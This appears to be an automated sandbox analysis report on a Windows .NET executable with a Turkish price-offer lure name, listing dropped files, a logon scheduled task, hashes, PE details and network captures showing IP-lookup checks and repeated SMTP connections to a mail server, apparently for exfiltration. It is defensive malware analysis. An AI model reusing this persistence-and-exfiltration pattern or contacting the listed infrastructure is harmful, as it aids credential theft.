File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1574
Entropy (8bit):	5.111806538271757
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaWxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTjv
MD5:	7BCE54627A8AA7FD77FF2C7B8135FE83
SHA1:	36BEC3A706ECC1A5759579FCE9066EA80979F43B
SHA-256:	84A5A106AA699E5D689A33BDC248B9021CEFC38F45A1CFC93EF618A17F676943
SHA-512:	BE80466AFCFA2B66B286D701E444FAEDE148A5DA4244809BEF8FFDCD235E354DC3A55A372091CD6B6BD2EA8CD20C578E64A79BDDD9893E50DCCAE9B0D8CC03FD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\cYDnGbgU.exe

Download File

Process:	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	712704
Entropy (8bit):	7.835085800916468
Encrypted:	false
SSDEEP:	12288:+qc7hDhagHCN19W18xNOMlCoSwbqcbK0qHwrqrgbxx8QGa6NRkDcUL0soISh:shDhagq19lN/S2BZrqsx8QGIcU4ISh
MD5:	2E6FC928822C8F9BB49E60B32E87F1AE
SHA1:	ECCD6B4F0AD70C48757078F4870E1D45263771C8
SHA-256:	28C597DFFA4E58341D159876A809955F673BAE6115787910D41080EF7BA2A6F0
SHA-512:	0240BFB136C35668C1D71515A5549360F00488011FC24F23B68474082592E8CF4D1180E5653A4A0CA89F96F0E3C18950463C6336F224FF2E2DBBC114246AF344
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 79%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...gaXf..............0......@......v.... ........@.. ... ....................... ........@.................................$...O.......T............................................................................ ............... ..H............text....n... ....... .............. ..`.rsrc...T........ ..................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\cYDnGbgU.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.835085800916468
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	F#U0130YAT TEKL#U0130F#U0130-2400.exe
File size:	712'704 bytes
MD5:	2e6fc928822c8f9bb49e60b32e87f1ae
SHA1:	eccd6b4f0ad70c48757078f4870e1d45263771c8
SHA256:	28c597dffa4e58341d159876a809955f673bae6115787910d41080ef7ba2a6f0
SHA512:	0240bfb136c35668c1d71515a5549360f00488011fc24f23b68474082592e8cf4d1180e5653a4a0ca89f96f0e3c18950463c6336f224ff2e2dbbc114246af344
SSDEEP:	12288:+qc7hDhagHCN19W18xNOMlCoSwbqcbK0qHwrqrgbxx8QGa6NRkDcUL0soISh:shDhagq19lN/S2BZrqsx8QGIcU4ISh
TLSH:	11E4124230782B67F178C6F9AA29448653F6246B361DE3C90CCA71DE94E1F252B90F77
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...gaXf..............0......@......v.... ........@.. ... ....................... ........@................................

File Icon


Icon Hash:	abc7e6c6cbcac581

Static PE Info

General

Entrypoint:	0x4a8e76
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66586167 [Thu May 30 11:22:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
inc ecx
add byte ptr [edx+00h], al
inc ebx
add byte ptr [eax+eax+45h], al
add byte ptr [esi+00h], al
inc edi
add byte ptr [eax+00h], cl
dec ecx
add byte ptr [edx+00h], cl
dec ebx
add byte ptr [eax+eax+4Dh], cl
add byte ptr [esi+00h], cl
dec edi
add byte ptr [eax+00h], dl
push ecx
add byte ptr [edx+00h], dl
push ebx
add byte ptr [eax+eax+55h], dl
add byte ptr [esi+00h], dl
push edi
add byte ptr [eax+00h], bl
pop ecx
add byte ptr [edx+00h], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa8e24	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xaa000	0x1254	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xac000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa6eb4	0xa8000	93707980401efaede63d9952f08ea0af	False	0.9382963634672619	data	7.934869907354881	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xaa000	0x1254	0x2000	1fbef0772612d11f6f9b88b58eefb440	False	0.431396484375	data	4.398228003046235	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xac000	0xc	0x2000	c8c0fd8643c39cd2d87c6ef6d2b36f51	False	0.0048828125	data	0.008814852707337104	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xaa100	0xc2b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8930979133226324
RT_GROUP_ICON	0xaad3c	0x14	data	1.05
RT_VERSION	0xaad60	0x2f4	data	0.42724867724867727
RT_MANIFEST	0xab064	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2024 15:57:22.740434885 CEST	49733	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:22.740521908 CEST	443	49733	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:22.740608931 CEST	49733	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:22.749685049 CEST	49733	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:22.749741077 CEST	443	49733	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:23.232501984 CEST	443	49733	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:23.232641935 CEST	49733	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:23.241302013 CEST	49733	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:23.241357088 CEST	443	49733	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:23.241873980 CEST	443	49733	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:23.317168951 CEST	49733	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:23.341828108 CEST	49733	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:23.383420944 CEST	443	49733	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:23.449592113 CEST	443	49733	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:23.449762106 CEST	443	49733	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:23.449835062 CEST	49733	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:23.456305981 CEST	49733	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:23.480547905 CEST	49734	80	192.168.2.4	208.95.112.1
Sep 21, 2024 15:57:23.485447884 CEST	80	49734	208.95.112.1	192.168.2.4
Sep 21, 2024 15:57:23.489270926 CEST	49734	80	192.168.2.4	208.95.112.1
Sep 21, 2024 15:57:23.489270926 CEST	49734	80	192.168.2.4	208.95.112.1
Sep 21, 2024 15:57:23.494173050 CEST	80	49734	208.95.112.1	192.168.2.4
Sep 21, 2024 15:57:23.955322981 CEST	80	49734	208.95.112.1	192.168.2.4
Sep 21, 2024 15:57:24.145328045 CEST	49734	80	192.168.2.4	208.95.112.1
Sep 21, 2024 15:57:25.246339083 CEST	49734	80	192.168.2.4	208.95.112.1
Sep 21, 2024 15:57:25.252038956 CEST	80	49734	208.95.112.1	192.168.2.4
Sep 21, 2024 15:57:25.252105951 CEST	49734	80	192.168.2.4	208.95.112.1
Sep 21, 2024 15:57:25.294770956 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:25.299691916 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:25.299761057 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:25.879782915 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:25.880290031 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:25.885160923 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.007129908 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.007496119 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:26.012378931 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.136888981 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.137396097 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:26.142292023 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.286726952 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.286751032 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.286761999 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.286778927 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.286827087 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:26.286952019 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:26.373460054 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.408019066 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:26.412990093 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.536032915 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.539416075 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:26.544233084 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.666455984 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.673094034 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:26.677926064 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.801260948 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:26.805762053 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:26.810591936 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:27.023859978 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:27.024092913 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:27.028958082 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:27.048090935 CEST	49738	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:27.048136950 CEST	443	49738	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:27.048208952 CEST	49738	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:27.051906109 CEST	49738	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:27.051920891 CEST	443	49738	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:27.151321888 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:27.151954889 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:27.156789064 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:27.293587923 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:27.293768883 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:27.298579931 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:27.491612911 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:27.492235899 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:27.492336988 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:27.492357016 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:27.492377043 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:27.497066021 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:27.497308016 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:27.497318983 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:27.497361898 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:27.692187071 CEST	443	49738	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:27.692272902 CEST	49738	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:27.694871902 CEST	49738	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:27.694886923 CEST	443	49738	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:27.695301056 CEST	443	49738	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:27.754662991 CEST	49738	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:27.759398937 CEST	49738	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:27.807398081 CEST	443	49738	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:27.875014067 CEST	443	49738	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:27.875078917 CEST	443	49738	172.67.74.152	192.168.2.4
Sep 21, 2024 15:57:27.875127077 CEST	49738	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:27.877837896 CEST	49738	443	192.168.2.4	172.67.74.152
Sep 21, 2024 15:57:27.880973101 CEST	49739	80	192.168.2.4	208.95.112.1
Sep 21, 2024 15:57:27.885963917 CEST	80	49739	208.95.112.1	192.168.2.4
Sep 21, 2024 15:57:27.886056900 CEST	49739	80	192.168.2.4	208.95.112.1
Sep 21, 2024 15:57:27.886166096 CEST	49739	80	192.168.2.4	208.95.112.1
Sep 21, 2024 15:57:27.891252041 CEST	80	49739	208.95.112.1	192.168.2.4
Sep 21, 2024 15:57:28.037429094 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:28.114053011 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:28.351192951 CEST	80	49739	208.95.112.1	192.168.2.4
Sep 21, 2024 15:57:28.395303011 CEST	49739	80	192.168.2.4	208.95.112.1
Sep 21, 2024 15:57:29.093331099 CEST	49739	80	192.168.2.4	208.95.112.1
Sep 21, 2024 15:57:29.093694925 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:29.098565102 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:29.098638058 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:29.098802090 CEST	80	49739	208.95.112.1	192.168.2.4
Sep 21, 2024 15:57:29.098866940 CEST	49739	80	192.168.2.4	208.95.112.1
Sep 21, 2024 15:57:29.649207115 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:29.649404049 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:29.654659033 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:29.782901049 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:29.787564993 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:29.792716980 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:29.921456099 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:29.922020912 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:29.927083015 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:30.078403950 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:30.078464031 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:30.078502893 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:30.078561068 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:30.129688025 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:30.170530081 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:30.179265976 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:30.184873104 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:30.313128948 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:30.317570925 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:30.322582960 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:30.450396061 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:30.450787067 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:30.455831051 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:31.614329100 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:31.614667892 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:31.615453959 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:31.615609884 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:31.616317987 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:31.616369009 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:31.617046118 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:31.617100954 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:31.832803965 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:31.856151104 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:31.857243061 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:32.126348019 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:32.127963066 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:32.135513067 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:32.263068914 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:32.263313055 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:32.268321037 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:32.401027918 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:32.401671886 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:32.406517982 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:32.534009933 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:32.535335064 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:32.535438061 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:32.535561085 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:32.535588980 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:57:32.540419102 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:32.540440083 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:32.540455103 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:32.540471077 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:33.058583021 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:57:33.119750977 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:59:05.271401882 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:59:05.276259899 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:59:05.400084019 CEST	587	49736	192.250.227.28	192.168.2.4
Sep 21, 2024 15:59:05.407438993 CEST	49736	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:59:09.117269039 CEST	49740	587	192.168.2.4	192.250.227.28
Sep 21, 2024 15:59:09.122221947 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:59:09.251671076 CEST	587	49740	192.250.227.28	192.168.2.4
Sep 21, 2024 15:59:09.255641937 CEST	49740	587	192.168.2.4	192.250.227.28

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2024 15:57:22.708718061 CEST	61326	53	192.168.2.4	1.1.1.1
Sep 21, 2024 15:57:22.716032028 CEST	53	61326	1.1.1.1	192.168.2.4
Sep 21, 2024 15:57:23.471462011 CEST	49332	53	192.168.2.4	1.1.1.1
Sep 21, 2024 15:57:23.478257895 CEST	53	49332	1.1.1.1	192.168.2.4
Sep 21, 2024 15:57:25.247270107 CEST	49763	53	192.168.2.4	1.1.1.1
Sep 21, 2024 15:57:25.293940067 CEST	53	49763	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 21, 2024 15:57:22.708718061 CEST	192.168.2.4	1.1.1.1	0xb6e9	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 21, 2024 15:57:23.471462011 CEST	192.168.2.4	1.1.1.1	0x7d31	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Sep 21, 2024 15:57:25.247270107 CEST	192.168.2.4	1.1.1.1	0xd86	Standard query (0)	mail.usgrovemall.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 21, 2024 15:57:22.716032028 CEST	1.1.1.1	192.168.2.4	0xb6e9	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Sep 21, 2024 15:57:22.716032028 CEST	1.1.1.1	192.168.2.4	0xb6e9	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Sep 21, 2024 15:57:22.716032028 CEST	1.1.1.1	192.168.2.4	0xb6e9	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Sep 21, 2024 15:57:23.478257895 CEST	1.1.1.1	192.168.2.4	0x7d31	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Sep 21, 2024 15:57:25.293940067 CEST	1.1.1.1	192.168.2.4	0xd86	No error (0)	mail.usgrovemall.com	192.250.227.28	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	208.95.112.1	80	7048	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 15:57:23.489270926 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Sep 21, 2024 15:57:23.955322981 CEST	175	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 13:57:23 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	208.95.112.1	80	7444	C:\Users\user\AppData\Roaming\cYDnGbgU.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 15:57:27.886166096 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Sep 21, 2024 15:57:28.351192951 CEST	175	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 13:57:27 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 55 X-Rl: 43 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
